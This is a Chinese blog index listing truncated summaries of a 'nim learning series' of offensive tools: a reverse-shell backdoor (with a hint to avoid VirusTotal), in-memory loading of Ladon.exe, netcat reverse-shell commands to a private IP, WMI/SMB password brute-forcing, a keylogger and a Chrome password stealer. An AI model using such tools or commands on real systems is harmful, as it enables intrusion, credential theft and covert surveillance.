学习委员*尼姆大人

摘要： nim 嵌入C 代码（nim学习系列） 假设手头上有一份现成的 C 代码，比如 PersistentCReverseShell ，这是一个用 C 语言实现的 windows 反弹 shell 后门，请不要上传到 www.virustotal.com 进行扫描。如何快速利用这段代码呢，好在 nim 提 阅读全文

摘要： 内存加载 ladon.exe（nim学习系列） 测试环境 windows 7 x64 + .NET Framework 4.0 Ladon.exe version 7.0 内存加载 Ladon.exe 首先将 ladon.exe 转换成 bytes array，这里使用 nim 的 readByte 阅读全文

摘要： nim 反弹 shell（nim学习系列） 反弹 netcat shell netcat 监听： nc -vv -l -p 80 nimNC 反弹shell: nimNC 172.20.10.4 80 源代码 nimNC.nim #[ Author: StudyCat Blog: https://w 阅读全文

摘要： WMI密码批量爆破 先探测目标 IP 地址 135 端口是否开放，后进行密码的扫描。调用 swbemlocator 对象连接目标，然后根据响应信息，判断账密是否正确。除了输出扫描过程，发现的正确账号密码会保存到当前工作目录下的wmilogin.log 文件中。 用法 Usage: wmiLogin. 阅读全文

摘要： 键盘记录器（nim学习系列） 本系列随笔仅用于学习目的，不能保证代码的兼容性和健壮性。 最近学习 @byt3bl33d3r 的Github项目，简单修改 keylogger_bin.nim，将键盘记录信息经过AES加密并保存到文件。 截图 程序将键盘记录输出到控制台的同时，也保存到文件（临时目录下一 阅读全文

摘要： 读取 chrome 浏览器密码（nim学习系列） 全版本 chrome 浏览器支持 仅支持 windows 系统下使用 需要 sqlite3_32.dll或者sqlite3_64.dll 读取当前用户 chrome 浏览器密码 源代码 chromepwd.nim #[ Author: StudyCa 阅读全文

摘要： SMB密码爆破（nim学习系列） 关键字：windows smb密码爆破；445端口；弱口令扫描； ntlmhash爆破； 使用方法 支持明文密码爆破 支持ntlmhash爆破 通过命令行或者文件导入目标IP地址 先扫描目标IP 445端口，如果开放再进行密码爆破 输出爆破过程，成功密码保持到 sm 阅读全文

摘要： 多线程子域名扫描（nim学习系列） 参考： https://github.com/rockcavera/nim-ndns 有趣的是，使用作者给出的例子，解析"www.baidu.com"及"nim-lang.org"的A记录居然返回空，很明显是不对的。 import ndns #默认使用 8.8.8 阅读全文

摘要： 调用 MessageBoxW 函数（nim学习系列） 不引用 winim 库调用 winapi 中的 MessageBoxW 函数。 源代码 popw.nim #[ Author: StudyCat Blog: https://www.cnblogs.com/studycat Github: htt 阅读全文

摘要： 读取firefox浏览器历史记录（nim学习系列） 读取firefox历史记录 读取firefox浏览器历史记录并保存到CSV文件（需要sqlite3_64.dll或者sqlite3_32.dll）。 编译： nim c -d:release --opt:size --cpu:amd64 firef 阅读全文